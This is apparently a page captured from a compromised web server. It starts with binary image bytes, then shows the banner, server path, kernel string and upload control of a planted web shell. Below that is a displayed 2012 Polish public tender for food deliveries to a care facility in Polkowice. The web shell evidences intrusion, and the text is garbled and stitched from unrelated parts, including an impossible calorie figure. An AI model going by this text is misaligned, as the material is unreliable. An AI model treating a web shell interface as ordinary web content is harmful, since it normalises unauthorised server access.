JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/482148-N-2012.html

<p class="kh_header"><b>Polkowice: Dostawa żywności do Placówki Socjalizacyjnej Skarbek w Polkowicach</b><br>
<b>Numer ogłoszenia: 482148 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Placówka Socjalizacyjna "SKARBEK" , ul. Browarna 1, 59-100 Polkowice, woj. dolnośląskie, tel. 076 7239664 (61, 62, 63), faks 076 7239664.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psskarbek.za.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności do Placówki Socjalizacyjnej Skarbek w Polkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Dostawa żywności do Placówki Socjalizacyjnej Skarbek w Polkowicach.
Zamówienie obejmuje:
 część I -  różne produkty spożywcze - CPV:15800000-6
 część II - mięso, produkty mięsne i wędliny - CPV: 15100000-9
 część III - produkty mleczarskie - CPV: 15500000-3
 część IV -  owoce i warzywa - CPV : 153 00000-1
 część V - pieczywo i wyroby piekarskie- CPV: 15810000- 9
 część VI - jaja- CPV : 03142500-3
 część VII - ryby mrożone i mrożonki CPV : 15220000-6 ,  15331170-9
Zarówno przedmiot jak i zakres zamówienia określony jest w Specyfikacji Istotnych Warunków Zamówienia w postaci Formularza cenowego (załącznik nr 2 do SIWZ), który określa potrzeby asortymentowo - ilościowe Zamawiającego na okres od 01.01.2013 r do 30.06.2013 r. 
Zamawiający nie jest zobowiązany do zamówienia podanych w załączniku ilości. Ilość ta będzie wynikać z rzeczywistych potrzeb Zamawiającego w okresie obowiązywania umowy. Dostawy przedmiotu zamówienia w poszczególnych okresach czasu muszą być realizowane wg. odrębnych zamówień dokonywanych przez Zamawiającego telefonicznie lub fax-em na jeden dzień roboczy przed planowaną dostawą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.81.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 15.22.00.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunków będzie dokonywana według kryterium spełnia - nie  spełnia. Niespełnienie chociaż jednego z wymaganych warunków skutkować będzie wykluczeniem  Dostawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zgodnie z art. 26 ust. 2b ustawy, Dostawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Dostawca zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował niezbędnymi zasobami przez cały okres realizacji zamówienia.
2. Zgodnie z art.22 ust.2a ustawy, Zamawiający żąda, aby w takiej sytuacji Dostawca przedstawił dokumenty potwierdzające spełnienie warunku opisanego w pkt.6 ppkt.2 i 3 specyfikacji oraz złożył pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
3. Zamawiający uznaje, że w sytuacji gdy Dostawca nie posiada własnej wiedzy i doświadczenia to korzystanie z obcej wiedzy i doświadczenia możliwe jest wyłącznie poprzez złożenie oferty wspólnej, względnie ewentualne zlecenie części zamówienia podwykonawcy, który wymaganą wiedzę i doświadczenie posiada.
4. Zamawiający uzna, że Dostawca spełnia warunek wiedzy i doświadczenia, jeżeli wykaże że wykonał lub /i wykonuje obecnie co najmniej dwie dostawy podobne do tych, stanowiących przedmiot niniejszego zamówienia, tzn. odpowiadającymi swoim rodzajem dostawom stanowiącym przedmiot niniejszego zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy (wg załączonego wzoru nr 1 ),
2) decyzja wystawiona dla Dostawcy przez właściwy organ Państwowej Inspekcji Weterynaryjnej (w przypadku producenta produktów pochodzenia zwierzęcego pozostającego pod nadzorem PIW) lub Państwowej Inspekcji Sanitarnej (gdy podmiot nie będący producentem pozostaje pod nadzorem PIS) o spełnieniu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie artykułami żywnościowymi oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów;
3) dokument wystawiony dla Dostawcy przez właściwy organ Państwowej Inspekcji Weterynaryjnej (w przypadku producenta produktów pochodzenia zwierzęcego pozostającego pod nadzorem PIW) lub Państwowej Inspekcji Sanitarnej (gdy podmiot nie będący producentem pozostaje pod nadzorem PIS) stwierdzający, że w procesie produkcji lub obrocie artykułami żywnościowymi jest stosowany system HACCP (dokument ten winien być wystawiony nie wcześniej niż 1 rok przed upływem terminu składania ofert); - dotyczy zakładów produkujących lub wprowadzających żywność do obrotu, które zgodnie z obowiązującymi przepisami podlegają takiemu obowiązkowi; jeżeli z tytułu prowadzonej działalności Dostawca nie podlega obowiązkowi wdrożenia i stosowania systemu HACCP przedstawi on stosowny dokument wystawiony dla producentów;
4) pełnomocnictwo podmiotów występujących wspólnie (jeżeli dotyczy),
5) pełnomocnictwo dla osoby/osób podpisującej ofertę i oświadczenia (jeśli uprawnienie tych osób nie wynika z innych dokumentów dołączonych do oferty),
6) zaparafowany projekt umowy,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana w umowie - w przypadku zmiany  ustawowej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.psskarbek.za.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Placówka Socjalizacyjna Skarbek, ul. Browarna 1, 59-100 Polkowice - Tablica ogłoszeń  lub gabinet intendenta..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2012 godzina 09:00, miejsce: Placówka Socjalizacyjna Skarbek, ul. Browarna 1, 59-100 Polkowice - Sekretariat , parter budynku ( łącznik)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1).Budyń z cukrem w proszku, mix smaków,bez sztucznych barwników-wartość energetyczna w 100  g produktu 85 kcal,białka 3,2g, op.60g -150 szt, 2). Fasola biała konserwowa -wartość energetyczna w 100 g produktu 100 kcal,białka 6,9g , 
op.400g - puszka 40 szt. 3). Galaretka owocowa w proszku, mix smaków,bez sztucznych barwników-wartość energetyczna w 100 g produktu 49 kcal,białka 1,7g, op.79g -300 szt. 4). Koncentrat pomidorowy-zawartość ekstraktu 30 ,wartość energetyczna w 100 g produktu 105 kcal,białka 4,9g, op.200g-słoik -100 szt. 5). Konserwa tyrolska sterylizowana mielonka  wysokowydajna,
op.300 g - puszka -30 szt. 6).Musztarda stołowa bez substancji konserwujących, op.200g-słoik 70 szt. 7).Ciastka deserowe na wagę,op. 1 kg- 5 kg. 8). Syrop owocowy, mix smaków-wartość energetyczna w 100 ml produktu 28 kcal,białka 0 g,op.500ml-80 szt. 9) Wafelek przekładany puszystym kremem oblany czekoladą ,mix smaków- wartość energetyczna w 100 g produktu 556 kcal,Białka 7,1 g, op.36g - 50 szt. 10).Paluszki solone-wartość energetyczna w 100 g produktu 406 kcal,białka 11,2 g op.70 g-260 szt. 11). Sos boloński w proszku-wartość energetyczna w 100 ml produktu 51 kcal,białka 1,5g, op. 46g -25 szt. 12). Sos pieczeniowy ciemny w proszku-wartość energetyczna w 100 ml produktu 37 kcal,białka 1,0 g, op.30g -100 szt. 13). Sos myśliwski w proszku-wartość energetyczna w 100 ml produktu 40 kcal, białka 1,4g, op. 33g-100 szt. 14). Sos pieczarkowy w proszku -wartość energetyczna w 100 ml produktu 43 kcal, białka 1,0g,op.34g.-85 szt. 15). Chrupki kukurydziane owocowe- skład: kasza kukurydziana,mąka pszenna,op. 80g-120 szt. 16). Cukier kryształ 1 kg-250 kg. 17). 
Biszkopt jasny 3- warstwowy, spody do tortów,op.420g -5 szt. 18)Herbatniki-wartość energetyczna w 100g produktu 451 kcal,białka 7,2g, op.100g 90 szt. 19)
Makaron nitki-skład:mąka makaronowa z pszenicy zwyczajnej, op. 1 kg-15 szt. 20)
Makaron świder-wartość energetyczna w 100 g produktu -357,7 kcal,białka 11,0g, op.500 g- 60 szt.21). Makaron spaghetti-wartość energetyczna w 100g produktu
345 kcal,białka 11,0g, op.500g -30 szt. 22)Makaron łazanka- wartość energetyczna w 100g produktu -357,7 kcal,białka11,0g, op.400 g-20 szt. 23).Makaron kolanko duże-wartość energetyczna w 100g produktu 
357,7 kcal,białka 11,0g, op.500 g.-40 szt. 24). Makaron muszelka duża -wartość energetyczna w 100g produktu 345 kcal,białka 11,0g, op.500 g-30 szt. 25.)Makaron muszelka mała-wartość energetyczna w 100g produktu 357,7 kcal, białka 11,0g, op.500 g- 20 szt. 26) Makaron zacierka-wartość energetyczna w 100 g produktu 363 kcal,białka13g, op.250 g-20 szt. 27). Margaryna do smarowania pieczywa-wartość energetyczna w 100 g produktu180 kcal,białka 0g, op.500 g
260 szt. 28). Margaryna mleczna-wartość energetyczna w 100g produktu 541 kcal,białka 0,1g, op.250 g -200 szt. 29)Mąka tortowa pszenna -wartość energetyczna w 100g produktu 348 kcal,białka10g, op.1 kg-200 kg. 30).Skrobia ziemniaczana, op.500 g 20 szt. 31) Paprykarz szczeciński-skład:ryba rozdrobniona 40%,op.156g - alupack-50 szt. 32). Sałatka rybna - skład: mięso ryb morskich 35%, op.135g - alupack-30 szt. 33)Pasztet prochowicki , konserwa sterylizowana,drobiowowieprzowa, op. 160 g - puszka -140 szt. 34). Płatki do mleka-kukurydziane,wartość energetyczna w 100g produktu 381 kcal,białka 7,3g, grys kukurydziany 98,2 % , op. 250g-50 szt. 35). Płatki do mleka-zbożowe kółka miodowe,wartość energetyczna w 100 g produktu 390 kcal,białka 7,3 g,
mąki 64,3%:pszenna,kukurydziana,owsiana i ryżowa, op.250 g-40 szt. 36)Płatki do mleka- zbożowe kulki o  smaku czekoladowym,wartość energetyczna w 100g produktu 382 kcal,białka7,7g,mąki 61,9%:pszenna,kukurydziana i ryżowa, op.250g
40 szt. 37)Herbata owocowa ekspresowa, mix smaków-wartość energetyczna w 100ml produktu 4kcal,białka 0,5g , op.60g  -30 szt.Napój herbaciany, mix smaków-wartość energetyczna w 100g produktu 387kcal,białka0,1g, op.300g-100 szt.
Herbata czarna expresowa-wartość energetyczna w 100 ml produktu 0 kcal,białka 0,1 g, op.100 torebek -50 szt. Kisiel z cukrem w proszku, mix smaków,bez sztucznych barwników-wartość energetyczna w 100 g produktu 48 kcal,białka 0,0g, op.77 g -200 szt. Sałatka szwedzka-skład:ogórki 70%,op. 860g - szklany słoik
12 szt. Olej  rzepakowy- wartość energetyczna w 100 g produktu -900 kcal,białka 0 g,op. 1l -200 szt. Powidła śliwkowe, op.320 g. -40 szt. Płatki owsiane górskie błyskawiczne, op. 500 g. -15 szt. Płatki jęczmienne błyskawiczne,
wartość energetyczna w 100g produktu 345 kcal,białka 9,3g,op.400g -20 szt. 
Zupa żurek w proszku - wartość energetyczna w 100 ml produktu 22 kcal,białko 0,8 g , op.49 g. -90 szt. Zupa barszcz biały w proszku - wartość energetyczna w 100 ml produktu 21 kcal, białka 1,0g , op.66g.-100 szt. Zupa fasolowa w proszku - wartość energetyczna w 100 ml produktu 32 kcal, białka 1,4 g, op. 65 g. -70 szt. , Chrupki snaki-wartość energetyczna w 100 g produktu 495 kcal,
białka 6,5g - mix smaków, op.19g -72 szt.Chrupki , mix smaków- wartość energetyczna w 100 g produktu 540 kcal, białka 66g, op. 70g .-150 szt. Cukierki owocowe -nadziewane mix smaków, op. 1 kg-5 kg. Drops owocowy 5 smaków , op.47 g. -40 szt. Wafel przekładany kremem kakaowym w czekoladzie-wartość energetyczna w 100 g produktu -532 kcal,białka 10,4g, op.39g-70 szt. Szczaw siekany, op.300 ml - słoik-20 szt. Zupa błyskawiczna,mix smaków-wartość energetyczna w 100 ml produktu 70 kcal, białka 1g, op.67 g. - 300 szt. Sałatka obiadowa, op. 0,9 l - 12 szt.Dżem owocowy -mix smaków niskosłodzony -wartość energetyczna w 100 g produktu 141 kcal,białka0,4 g, op. 280g-słoik, -150 szt.
Miód pszczeli wielokwiatowy, op.380 g-słoik - 20 szt. Napój kakaowy instant- wartość energetyczna w 100g produktu 382 kcal,białka 3,7g ,op.300g-60 szt. Kakao ciemne o obniżonej zawartości tłuszczu, op.150 g.-10 szt. Rozpuszczalna kawa zbożowa,skład:zboża72%(jęczmień,żyto)-warość energetyczna w 100g produktu 331kcal,białka 4,3g,op.150g.-12 szt. Kasza manna błyskawiczna-wartość energetyczna w 100g produktu 361 kcal,białka 10,1 g, op.500 g. -30 szt. 
Kasza jęczmienna wiejska gruba-wartość energetyczna w 100g produktu 21 kcal,białka 6,9g, op.1 kg - 30 szt. Kasza gryczana , op.1kg- 20 szt. Ryż biały długoziarnisty-wartość energetyczna w 100g produktu 349kcal,białka 6,7g, op.1kg - 50 kg. Płatki ryżowe błyskawiczne-wartość energetyczna w 100g produktu 
339 kcal,białka 6,7 g, op.250 g- 20 szt. Patisony konserwowe-wartość energetyczna w 100 g - produktu 22 kcal, białko1,2 g,op.500g  - 20 szt. Bulion drobiowy w kostkach-wartość energetyczna w 100 ml produktu 7 kcal,białka 0,1g, op.12 kostek-40 szt. Płatki do mleka - wartość energetyczna w 100 g produktu 
379 kcal, białka 8,1 g, op.225 g. -40 szt. Zaprawa cytrynowa-skład: sok cytrynowy 40%, op. 500 g. - 25 szt. Bułka tarta-wartość energetyczna w 100g produktu 347 kcal, białka 9,6g, op.500 g- 30 szt. Groszek konserwowy,op.400 g -
25 szt. Kukurydza cukrowa konserwowa-wartość energetyczna w 100 g produktu 92 kcal,białka 2,1g, op.400g- 45 szt. Marchew z groszkiem i kukurydzą, wartość energetyczna w 100 g produktu 51 kcal, białka 10,4g, op.500 ml-słoik - 20 szt. Ketchup łagodny-wartość energetyczna w 100 g produktu 95kcal,białka 0,5g, op.500 g. -80 szt.Przyprawa w płynie-skład:glutaminian monosodowy, E635,sól,wzmacniacze  smaku, op.960g - szklana butla-15 szt. Przyprawa warzywna do potraw - wartość energetyczna w 100 g produktu 137 kcal, białka 8,5g,op.75g - 25 kg.Majonez dekoracyjny,bez konserwantów- wartość energetyczna w 100 g produktu 2889 kcal, białka1,3g, op.250 ml- szklany słoik
20 szt. Majonez dekoracyjny,bez konserwantów- wartość energetyczna w 100 g produktu 2889 kcal,białka 1,3g, op.400 ml - szklany słoik-40 szt. Majonez dekoracyjny,bez konserwantów- wartość energetyczna w 100 g produktu 2889 kcal,białka 1,3g, op.700 ml - szklany słoik - 15 szt. Groch łuskany, op.1 kg 
15 szt
Fasola biała Jaś, op.1 kg
30 szt
